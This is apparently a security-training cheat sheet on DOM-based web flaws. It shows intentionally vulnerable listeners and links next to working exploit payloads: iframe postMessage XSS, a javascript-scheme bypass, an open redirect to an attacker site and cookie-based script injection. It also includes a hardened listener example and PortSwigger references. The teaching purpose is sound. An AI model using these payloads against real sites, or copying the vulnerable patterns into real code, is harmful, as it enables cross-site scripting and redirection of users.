Sources and sinks
If a website handles web messages in an unsafe way, e.g. without verifying the origin of the incoming message, the code inside the event listener becomes a potential sink: whatever a sender passes to postMessage() flows straight into it.
Vulnerable code
<script>
  // Sink: e.origin is never checked and e.data is written with innerHTML,
  // so any page able to postMessage() to this window controls the HTML.
  window.addEventListener('message', function(e) {
    document.getElementById('name').innerHTML = e.data;
  })
</script>
Exploit
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">
Vulnerable code
<script>
  // Sink: no origin check, and the indexOf() test only requires 'http:' or
  // 'https:' to appear somewhere in the string; it does not validate the scheme.
  window.addEventListener('message', function(e) {
    var url = e.data;
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
      location.href = url;
    }
  }, false);
</script>
Exploit
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">
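A hardened version of the two listeners above, added here as an example and not taken from the original page. It assumes the only trusted sender is https://trusted-parent.example and that the page itself is served from https://vulnerable-site.com (both placeholder values); the decision logic is kept in a plain function so it can be exercised without a DOM.

```javascript
// Added example: origin check, typed messages and safe sinks for a
// 'message' listener. Trusted origin is a hypothetical placeholder.
const TRUSTED_ORIGINS = new Set(['https://trusted-parent.example']);
const PAGE_BASE = 'https://vulnerable-site.com'; // hypothetical page origin

// Returns the action the listener would take:
// {type: 'ignore', reason} or {type: 'setName' | 'navigate', value}.
function handleMessage(event) {
  // 1. Compare the full origin against an allow-list; never use indexOf()
  //    or startsWith() here, a substring match is trivially satisfied.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { type: 'ignore', reason: 'untrusted origin ' + event.origin };
  }
  // 2. Expect a typed object rather than a bare string.
  const data = event.data;
  if (typeof data !== 'object' || data === null || typeof data.kind !== 'string') {
    return { type: 'ignore', reason: 'malformed message' };
  }
  if (data.kind === 'setName' && typeof data.name === 'string') {
    // Written via textContent (see wiring below), so markup stays inert text.
    return { type: 'setName', value: data.name };
  }
  if (data.kind === 'navigate' && typeof data.url === 'string') {
    // Parse the URL and check its scheme; 'javascript:print()//https:' is
    // rejected because its protocol is 'javascript:', whatever else it contains.
    let parsed;
    try {
      parsed = new URL(data.url, PAGE_BASE);
    } catch (err) {
      return { type: 'ignore', reason: 'invalid url' };
    }
    if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
      return { type: 'ignore', reason: 'disallowed scheme ' + parsed.protocol };
    }
    return { type: 'navigate', value: parsed.href };
  }
  return { type: 'ignore', reason: 'unknown kind ' + data.kind };
}

// Browser wiring; skipped under Node, where window/document do not exist.
if (typeof window !== 'undefined') {
  window.addEventListener('message', function (e) {
    const action = handleMessage(e);
    if (action.type === 'setName') {
      document.getElementById('name').textContent = action.value;
    } else if (action.type === 'navigate') {
      location.href = action.value;
    }
  }, false);
}
```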
Vulnerable code
<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1]; else location.href = "/"'>Back</a>
Exploit
https://vulnerable-website.com/?url=https://attacker-site.com
Vulnerable code
<a href='https://website.com/product?productId=2'>Last viewed product</a>
<script>
  // Sink: window.location, fragment included, is written into the cookie
  // unencoded, and the link above is later built from that cookie value.
  document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
Exploit
<iframe src="https://website.com/product?productId=2#'><script>print()</script>"></iframe>
References
- PortSwigger - Web Security Academy - DOM-based JavaScript injection
- PortSwigger - Web Security Academy - DOM-based document-domain manipulation
- PortSwigger - Web Security Academy - DOM-based WebSocket-URL poisoning
- PortSwigger - Web Security Academy - DOM-based link manipulation
- PortSwigger - Web Security Academy - Web message manipulation
- PortSwigger - Web Security Academy - DOM-based Ajax request-header manipulation
- PortSwigger - Web Security Academy - DOM-based local file-path manipulation
- PortSwigger - Web Security Academy - DOM-based client-side SQL injection
- PortSwigger - Web Security Academy - DOM-based HTML5-storage manipulation
- PortSwigger - Web Security Academy - DOM-based client-side XPath injection
- PortSwigger - Web Security Academy - DOM-based client-side JSON injection
- PortSwigger - Web Security Academy - DOM-data manipulation
- PortSwigger - Web Security Academy - DOM-based denial of service